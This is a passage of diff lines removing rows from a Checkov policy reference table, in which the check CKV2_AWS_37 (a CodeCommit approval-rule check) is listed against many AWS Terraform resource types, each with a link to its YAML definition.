-| 1019 | CKV2_AWS_37     | resource | aws_sagemaker_endpoint                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1020 | CKV2_AWS_37     | resource | aws_sagemaker_endpoint_configuration                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1021 | CKV2_AWS_37     | resource | aws_sagemaker_model                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1022 | CKV2_AWS_37     | resource | aws_sagemaker_notebook_instance                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1023 | CKV2_AWS_37     | resource | aws_sagemaker_notebook_instance_lifecycle_configuration | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1024 | CKV2_AWS_37     | resource | aws_secretsmanager_secret                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1025 | CKV2_AWS_37     | resource | aws_secretsmanager_secret_rotation                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1026 | CKV2_AWS_37     | resource | aws_secretsmanager_secret_version                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1027 | CKV2_AWS_37     | resource | aws_security_group                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1028 | CKV2_AWS_37     | resource | aws_security_group_rule                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1029 | CKV2_AWS_37     | resource | aws_securityhub_account                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1030 | CKV2_AWS_37     | resource | aws_securityhub_member                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1031 | CKV2_AWS_37     | resource | aws_securityhub_product_subscription                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1032 | CKV2_AWS_37     | resource | aws_securityhub_standards_subscription                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1033 | CKV2_AWS_37     | resource | aws_service_discovery_http_namespace                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1034 | CKV2_AWS_37     | resource | aws_service_discovery_private_dns_namespace             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1035 | CKV2_AWS_37     | resource | aws_service_discovery_public_dns_namespace              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1036 | CKV2_AWS_37     | resource | aws_service_discovery_service                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1037 | CKV2_AWS_37     | resource | aws_servicecatalog_portfolio                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1038 | CKV2_AWS_37     | resource | aws_servicequotas_service_quota                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1039 | CKV2_AWS_37     | resource | aws_ses_active_receipt_rule_set                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1040 | CKV2_AWS_37     | resource | aws_ses_configuration_set                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1041 | CKV2_AWS_37     | resource | aws_ses_domain_dkim                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1042 | CKV2_AWS_37     | resource | aws_ses_domain_identity                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1043 | CKV2_AWS_37     | resource | aws_ses_domain_identity_verification                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1044 | CKV2_AWS_37     | resource | aws_ses_domain_mail_from                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1045 | CKV2_AWS_37     | resource | aws_ses_email_identity                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1046 | CKV2_AWS_37     | resource | aws_ses_event_destination                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1047 | CKV2_AWS_37     | resource | aws_ses_identity_notification_topic                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1048 | CKV2_AWS_37     | resource | aws_ses_identity_policy                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1049 | CKV2_AWS_37     | resource | aws_ses_receipt_filter                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1050 | CKV2_AWS_37     | resource | aws_ses_receipt_rule                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1051 | CKV2_AWS_37     | resource | aws_ses_receipt_rule_set                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1052 | CKV2_AWS_37     | resource | aws_ses_template                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1053 | CKV2_AWS_37     | resource | aws_sfn_activity                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1054 | CKV2_AWS_37     | resource | aws_sfn_state_machine                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1055 | CKV2_AWS_37     | resource | aws_shield_protection                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1056 | CKV2_AWS_37     | resource | aws_simpledb_domain                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1057 | CKV2_AWS_37     | resource | aws_snapshot_create_volume_permission                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1058 | CKV2_AWS_37     | resource | aws_sns_platform_application                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1059 | CKV2_AWS_37     | resource | aws_sns_sms_preferences                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1060 | CKV2_AWS_37     | resource | aws_sns_topic                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1061 | CKV2_AWS_37     | resource | aws_sns_topic_policy                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1062 | CKV2_AWS_37     | resource | aws_sns_topic_subscription                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1063 | CKV2_AWS_37     | resource | aws_spot_datafeed_subscription                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1064 | CKV2_AWS_37     | resource | aws_spot_fleet_request                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1065 | CKV2_AWS_37     | resource | aws_spot_instance_request                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1066 | CKV2_AWS_37     | resource | aws_sqs_queue                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1067 | CKV2_AWS_37     | resource | aws_sqs_queue_policy                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1068 | CKV2_AWS_37     | resource | aws_ssm_activation                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1069 | CKV2_AWS_37     | resource | aws_ssm_association                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1070 | CKV2_AWS_37     | resource | aws_ssm_document                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1071 | CKV2_AWS_37     | resource | aws_ssm_maintenance_window                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1072 | CKV2_AWS_37     | resource | aws_ssm_maintenance_window_target                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1073 | CKV2_AWS_37     | resource | aws_ssm_maintenance_window_task                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1074 | CKV2_AWS_37     | resource | aws_ssm_parameter                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1075 | CKV2_AWS_37     | resource | aws_ssm_patch_baseline                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1076 | CKV2_AWS_37     | resource | aws_ssm_patch_group                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1077 | CKV2_AWS_37     | resource | aws_ssm_resource_data_sync                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1078 | CKV2_AWS_37     | resource | aws_storagegateway_cache                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1079 | CKV2_AWS_37     | resource | aws_storagegateway_cached_iscsi_volume                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1080 | CKV2_AWS_37     | resource | aws_storagegateway_gateway                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1081 | CKV2_AWS_37     | resource | aws_storagegateway_nfs_file_share                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1082 | CKV2_AWS_37     | resource | aws_storagegateway_smb_file_share                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1083 | CKV2_AWS_37     | resource | aws_storagegateway_upload_buffer                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1084 | CKV2_AWS_37     | resource | aws_storagegateway_working_storage                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1085 | CKV2_AWS_37     | resource | aws_subnet                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1086 | CKV2_AWS_37     | resource | aws_swf_domain                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1087 | CKV2_AWS_37     | resource | aws_transfer_server                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1088 | CKV2_AWS_37     | resource | aws_transfer_ssh_key                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1089 | CKV2_AWS_37     | resource | aws_transfer_user                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1090 | CKV2_AWS_37     | resource | aws_volume_attachment                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1091 | CKV2_AWS_37     | resource | aws_vpc                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1092 | CKV2_AWS_37     | resource | aws_vpc_dhcp_options                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1093 | CKV2_AWS_37     | resource | aws_vpc_dhcp_options_association                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1094 | CKV2_AWS_37     | resource | aws_vpc_endpoint                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1095 | CKV2_AWS_37     | resource | aws_vpc_endpoint_connection_notification                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1096 | CKV2_AWS_37     | resource | aws_vpc_endpoint_route_table_association                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1097 | CKV2_AWS_37     | resource | aws_vpc_endpoint_service                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1098 | CKV2_AWS_37     | resource | aws_vpc_endpoint_service_allowed_principal              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1099 | CKV2_AWS_37     | resource | aws_vpc_endpoint_subnet_association                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1100 | CKV2_AWS_37     | resource | aws_vpc_ipv4_cidr_block_association                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1101 | CKV2_AWS_37     | resource | aws_vpc_peering_connection                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1102 | CKV2_AWS_37     | resource | aws_vpc_peering_connection_accepter                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1103 | CKV2_AWS_37     | resource | aws_vpc_peering_connection_options                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1104 | CKV2_AWS_37     | resource | aws_vpn_connection                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1105 | CKV2_AWS_37     | resource | aws_vpn_connection_route                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1106 | CKV2_AWS_37     | resource | aws_vpn_gateway                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1107 | CKV2_AWS_37     | resource | aws_vpn_gateway_attachment                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1108 | CKV2_AWS_37     | resource | aws_vpn_gateway_route_propagation                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1109 | CKV2_AWS_37     | resource | aws_waf_byte_match_set                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1110 | CKV2_AWS_37     | resource | aws_waf_geo_match_set                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1111 | CKV2_AWS_37     | resource | aws_waf_ipset                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
